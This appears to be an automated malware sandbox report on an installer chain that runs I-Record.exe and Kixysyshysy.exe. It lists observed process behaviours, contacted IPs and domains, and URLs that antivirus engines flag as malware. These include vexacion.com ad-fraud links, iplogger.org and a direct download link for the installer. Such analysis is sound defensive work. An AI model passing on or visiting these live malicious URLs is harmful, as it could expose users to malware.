Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\i-record\I-Record.exe	Queries volume information: C:\Program Files (x86)\i-record\AForge.Video.FFMPEG.dll VolumeInformation
Source: C:\Program Files (x86)\i-record\I-Record.exe	Queries volume information: C:\Program Files (x86)\i-record\AForge.Video.FFMPEG.dll VolumeInformation
Source: C:\Program Files (x86)\i-record\I-Record.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Program Files (x86)\i-record\I-Record.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Program Files (x86)\i-record\I-Record.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Program Files (x86)\i-record\I-Record.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\1nJGU59JPU.exe

Code function: 0_2_004026C4 GetSystemTime,

0_2_004026C4

Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp

Code function: 1_2_00455644 GetUserNameA,

1_2_00455644

Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp

Code function: 1_2_00458670 GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,CreateFileA,SetNamedPipeHandleState,CreateProcessA,CloseHandle,CloseHandle,

1_2_00458670

Source: C:\Users\user\Desktop\1nJGU59JPU.exe

Code function: 0_2_00405CF4 GetVersionExA,

0_2_00405CF4

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
108.177.15.154	stats.l.doubleclick.net	United States	15169	GOOGLEUS	false
35.201.70.46	directdexchange.com	United States	15169	GOOGLEUS	false
18.136.177.10	xhr.invl.co	United States	16509	AMAZON-02US	false
142.250.185.226	googleads.g.doubleclick.net	United States	15169	GOOGLEUS	false
172.67.131.171	cdntechone.com	United States	13335	CLOUDFLARENETUS	false
157.240.17.35	star-mini.c10r.facebook.com	United States	32934	FACEBOOKUS	false
151.101.1.12	cdn.shopify.com	United States	54113	FASTLYUS	false
51.159.62.6	s3.fr-par.scw.cloud	France	12876	OnlineSASFR	false
13.224.96.30	d1h4d6cj0c830c.cloudfront.net	United States	16509	AMAZON-02US	false
172.67.39.148	static.addtoany.com	United States	13335	CLOUDFLARENETUS	false
93.158.134.119	mc.yandex.ru	Russian Federation	13238	YANDEXRU	false
37.230.138.66	360devtracking.com	Russian Federation	203674	ROCKETTELECOM-ASRU	false
142.250.154.127	stun.l.google.com	United States	15169	GOOGLEUS	false
142.250.186.110	google.com	United States	15169	GOOGLEUS	false
142.250.184.227	gstaticadssl.l.google.com	United States	15169	GOOGLEUS	false
104.18.72.113	static.zdassets.com	United States	13335	CLOUDFLARENETUS	false
104.26.4.235	www.adsaro.net	United States	13335	CLOUDFLARENETUS	false
13.224.96.72	d2pbcviywxotf2.cloudfront.net	United States	16509	AMAZON-02US	false
104.16.18.94	cdnjs.cloudflare.com	United States	13335	CLOUDFLARENETUS	false
13.224.96.103	di7rtopbiewfz.cloudfront.net	United States	16509	AMAZON-02US	false
172.217.16.142	clients.l.google.com	United States	15169	GOOGLEUS	false
172.67.148.61	source3.boys4dayz.com	United States	13335	CLOUDFLARENETUS	false
104.21.51.248	cdn.langshop.app	United States	13335	CLOUDFLARENETUS	false
104.22.21.108	shopify.privy.com	United States	13335	CLOUDFLARENETUS	false
37.48.68.71	datatechone.com	Netherlands	60781	LEASEWEB-NL-AMS-01NetherlandsNL	false
104.26.1.133	product-labels-pro.bsscommerce.com	United States	13335	CLOUDFLARENETUS	false
13.224.96.4	dxozrhxfn9bwf.cloudfront.net	United States	16509	AMAZON-02US	false
139.45.197.139	myhypeposts.com	Netherlands	9002	RETN-ASEU	false
172.67.215.223	www.cloud-security.xyz	United States	13335	CLOUDFLARENETUS	false
13.224.96.86	dyjtibcz3b48v.cloudfront.net	United States	16509	AMAZON-02US	false
104.22.25.116	littlecdn.com	United States	13335	CLOUDFLARENETUS	false
18.184.39.239	nginx.1cros.net	United States	16509	AMAZON-02US	false
104.22.20.108	api.privy.com	United States	13335	CLOUDFLARENETUS	false
163.172.208.8	s3.nl-ams.scw.cloud	United Kingdom	12876	OnlineSASFR	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
104.18.70.113	ekr.zdassets.com	United States	13335	CLOUDFLARENETUS	false
192.243.59.12	www.profitabletrustednetwork.com	Dominica	39572	ADVANCEDHOSTERS-ASNL	false
13.224.96.45	d28ndrjbfdkv0d.cloudfront.net	United States	16509	AMAZON-02US	false
34.196.60.195	d8bc12a0-pushowlbackend-pu-0f8c-1616299444.us-east-1.elb.amazonaws.com	United States	14618	AMAZON-AESUS	false
172.67.138.139	goodnotification.net	United States	13335	CLOUDFLARENETUS	false
212.82.100.181	spdc-global.pbp.gysm.yahoodns.net	United Kingdom	34010	YAHOO-IRDGB	false
35.169.187.184	cloudmonitor-logsss-com-1570812809.us-east-1.elb.amazonaws.com	United States	14618	AMAZON-AESUS	false
162.0.210.44	connectini.net	Canada	35893	ACPCA	false
139.45.195.8	my.rtmark.net	Netherlands	9002	RETN-ASEU	false
23.227.38.74	shops.myshopify.com	Canada	13335	CLOUDFLARENETUS	false
23.50.98.104	chimpstatic.com	United States	16625	AKAMAI-ASUS	false
139.45.197.251	yonhelioliskor.com	Netherlands	9002	RETN-ASEU	false
151.101.1.195	seo.apps.avada.io	United States	54113	FASTLYUS	false
104.16.227.72	static.shareasale.com	United States	13335	CLOUDFLARENETUS	false
52.173.139.125	dashboard.wheelio-app.com	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
157.240.17.15	scontent.xx.fbcdn.net	United States	32934	FACEBOOKUS	false
136.244.117.138	oneimpress.io	United States	20473	AS-CHOOPAUS	false
13.224.96.122	d2h3z7munabi1z.cloudfront.net	United States	16509	AMAZON-02US	false
13.224.96.58	d21fnsp1pg8r6b.cloudfront.net	United States	16509	AMAZON-02US	false
142.250.185.164	www.google.com	United States	15169	GOOGLEUS	false
34.138.230.116	monorail-production-web-apps-a-us-east1-10.shopifycloud.com	United States	2686	ATGS-MMD-ASUS	false
148.251.234.83	iplogger.org	Germany	24940	HETZNER-ASDE	false
185.26.99.58	ad.admitad.com	Germany	44066	DE-FIRSTCOLOwwwfirst-colonetDE	false
142.250.184.205	accounts.google.com	United States	15169	GOOGLEUS	false
13.224.96.124	d1s33wn15r3bpe.cloudfront.net	United States	16509	AMAZON-02US	false
142.250.186.136	www-googletagmanager.l.google.com	United States	15169	GOOGLEUS	false
142.250.186.99	www.google.co.uk	United States	15169	GOOGLEUS	false
104.19.168.102	widgets.automizely.com	United States	13335	CLOUDFLARENETUS	false
104.18.28.218	sdks.am-static.com	United States	13335	CLOUDFLARENETUS	false
52.38.191.23	messengerview.1talking.net	United States	16509	AMAZON-02US	false
35.157.179.180	tpx.tesseradigital.com	United States	16509	AMAZON-02US	false
94.126.16.223	p-chzh00.kxcdn.com	Switzerland	21069	ASN-METANETRoutingpeeringissuesnocmetanetchCH	false
104.26.5.175	cdn.admitad-connect.com	United States	13335	CLOUDFLARENETUS	false
13.224.96.29	d1lytq8w52fohg.cloudfront.net	United States	16509	AMAZON-02US	false
139.45.197.240	propeller-tracking.com	Netherlands	9002	RETN-ASEU	false
87.248.118.23	edge.gycpi.b.yahoodns.net	United Kingdom	203220	YAHOO-DEBDE	false
139.45.197.238	atzekromchan.com	Netherlands	9002	RETN-ASEU	false
139.45.197.236	vexacion.com	Netherlands	9002	RETN-ASEU	false
151.115.10.1	s3.pl-waw.scw.cloud	United Kingdom	12876	OnlineSASFR	false
142.250.181.225	googlehosted.l.googleusercontent.com	United States	15169	GOOGLEUS	false
54.174.190.185	unknown	United States	14618	AMAZON-AESUS	false

Private

IP
192.168.2.1
192.168.2.3

Contacted Domains

Name	IP	Active
gstaticadssl.l.google.com	142.250.184.227	true
s3.nl-ams.scw.cloud	163.172.208.8	true
d1s33wn15r3bpe.cloudfront.net	13.224.96.124	true
monorail-production-web-apps-a-us-east1-10.shopifycloud.com	34.138.230.116	true
d6gl2ual1jt2h.cloudfront.net	13.224.96.80	true
d2h3z7munabi1z.cloudfront.net	13.224.96.122	true
d28ndrjbfdkv0d.cloudfront.net	13.224.96.45	true
directdexchange.com	35.201.70.46	true
di7rtopbiewfz.cloudfront.net	13.224.96.103	true
ekr.zdassets.com	104.18.70.113	true
www.google.com	142.250.185.164	true
littlecdn.com	104.22.25.116	true
nginx.1cros.net	18.184.39.239	true
toa.mygametoa.com	34.64.183.91	true
google.com	142.250.186.110	true
seo.apps.avada.io	151.101.1.195	true
cloudmonitor-logsss-com-1570812809.us-east-1.elb.amazonaws.com	35.169.187.184	true
cdn.shopify.com	151.101.1.12	true
assets.prod.abebookscdn.com	13.224.96.28	true
d1qcny5kzqmo9s.cloudfront.net	13.224.96.6	true
d2ovawmze1vtgu.cloudfront.net	13.224.96.120	true
oneimpress.io	136.244.117.138	true
googleads.g.doubleclick.net	142.250.185.226	true
chimpstatic.com	23.50.98.104	true
www.google.co.uk	142.250.186.99	true
vexacion.com	139.45.197.236	true
cdn.langshop.app	104.21.51.248	true
clients.l.google.com	172.217.16.142	true
stun.l.google.com	142.250.154.127	true
googlehosted.l.googleusercontent.com	142.250.181.225	true
s.w.org	192.0.77.48	true
data.abebooks.com	3.86.136.12	true
mc.yandex.ru	93.158.134.119	true
goodnotification.net	172.67.138.139	true
htagzdownload.pw	35.205.61.67	true
www.cloud-security.xyz	172.67.215.223	true
static.shareasale.com	104.16.227.72	true
www.adsaro.net	104.26.4.235	true
propeller-tracking.com	139.45.197.240	true
affiliates-abebooks-com.customtraffic.impactradius.com	35.244.197.23	true
scontent.xx.fbcdn.net	157.240.17.15	true
cdntechone.com	172.67.131.171	true
cdn.admitad-connect.com	104.26.5.175	true
diromalxx.com	62.122.170.197	true
myhypeposts.com	139.45.197.139	true
accounts.google.com	142.250.184.205	true
atzekromchan.com	139.45.197.238	true
app.avada.io	151.101.1.195	true
iplogger.org	148.251.234.83	true
api.privy.com	104.22.20.108	true
widgets.automizely.com	104.19.168.102	true
d21fnsp1pg8r6b.cloudfront.net	13.224.96.58	true
edge.gycpi.b.yahoodns.net	87.248.118.23	true
c.xyzgamec.com	172.67.143.225	true
dxozrhxfn9bwf.cloudfront.net	13.224.96.4	true
yonhelioliskor.com	139.45.197.251	true
curtainshare.su	172.67.133.243	true
messengerview.1talking.net	52.38.191.23	true
www.profitabletrustednetwork.com	192.243.59.12	true
d3lp7swsejht2u.cloudfront.net	13.224.96.124	true
sdks.am-static.com	104.18.28.218	true
static.zdassets.com	104.18.72.113	true
cdnjs.cloudflare.com	104.16.18.94	true
d2393mmhak2ysp.cloudfront.net	13.224.96.116	true
datatechone.com	37.48.68.71	true
b.dxyzgame.com	172.67.164.165	true
star-mini.c10r.facebook.com	157.240.17.35	true
www.ojrq.net	34.95.127.121	true
stats.l.doubleclick.net	108.177.15.154	true
dyjtibcz3b48v.cloudfront.net	13.224.96.86	true
static.addtoany.com	172.67.39.148	true
connectini.net	162.0.210.44	true
tpx.tesseradigital.com	35.157.179.180	true
source3.boys4dayz.com	172.67.148.61	true
dr35amawwlvaz.cloudfront.net	13.224.96.15	true
shops.myshopify.com	23.227.38.74	true
d8bc12a0-pushowlbackend-pu-0f8c-1616299444.us-east-1.elb.amazonaws.com	34.196.60.195	true
d1lytq8w52fohg.cloudfront.net	13.224.96.29	true
spdc-global.pbp.gysm.yahoodns.net	212.82.100.181	true
ztedevices.zendesk.com	104.16.51.111	true
p-chzh00.kxcdn.com	94.126.16.223	true
s3.pl-waw.scw.cloud	151.115.10.1	true
shopify.privy.com	104.22.21.108	true
product-labels-pro.bsscommerce.com	104.26.1.133	true
d2pbcviywxotf2.cloudfront.net	13.224.96.72	true
www-google-analytics.l.google.com	142.250.186.110	true
www-googletagmanager.l.google.com	142.250.186.136	true
fonts.shopifycdn.com	151.101.1.12	true
ad.admitad.com	185.26.99.58	true
gp.gamebuy768.com	172.67.143.210	true
360devtracking.com	37.230.138.66	true
my.rtmark.net	139.45.195.8	true
d155tv9w8vktl.cloudfront.net	13.224.96.88	true
s3.fr-par.scw.cloud	51.159.62.6	true
d1h4d6cj0c830c.cloudfront.net	13.224.96.30	true
dashboard.wheelio-app.com	52.173.139.125	true
widget-mediator.zopim.com	3.120.252.147	true
xhr.invl.co	18.136.177.10	true
monorail-edge.shopifysvc.com	unknown	unknown
glsdk.logsss.com	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://vexacion.com/afu.php?zoneid=1851513	true	1%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://vexacion.com/?z=1492888&syncedCookie=true	true	Avira URL Cloud: malware	unknown
http://onepiece.s3.pl-waw.scw.cloud/pub-carousel/I-Record.exe	false	Avira URL Cloud: safe	unknown
http://vexacion.com/?z=1851513&syncedCookie=false	true	Avira URL Cloud: malware	unknown
http://vexacion.com/afu.php?zoneid=1343177&var=3	true	Avira URL Cloud: malware	unknown
http://vexacion.com/?z=1851483&syncedCookie=false	true	Avira URL Cloud: malware	unknown
http://vexacion.com/?z=1294231&syncedCookie=false	true	Avira URL Cloud: malware	unknown
http://vexacion.com/?z=1339680&syncedCookie=false	true	Avira URL Cloud: malware	unknown

AV Detection:

Antivirus detection for URL or domain

Source: http://vexacion.com/afu.php?zoneid=1851513	Avira URL Cloud: Label: malware
Source: http://vexacion.com/?z=1492888&syncedCookie=true	Avira URL Cloud: Label: malware
Source: http://vexacion.com/afu.php?zoneid=1851483leSystem	Avira URL Cloud: Label: malware
Source: http://vexacion.com/?z=1851513&syncedCookie=false	Avira URL Cloud: Label: malware
Source: http://vexacion.com/afu.php?zoneid=1851483z	Avira URL Cloud: Label: malware
Source: http://vexacion.com/afu.php?zoneid=1343177&var=3	Avira URL Cloud: Label: malware
Source: http://vexacion.com/?z=1851483&syncedCookie=false	Avira URL Cloud: Label: malware
Source: http://vexacion.com/?z=1294231&syncedCookie=false	Avira URL Cloud: Label: malware
Source: http://vexacion.com/afu.php?zoneid=1851483C:	Avira URL Cloud: Label: malware
Source: http://vexacion.com/?z=1339680&syncedCookie=false	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

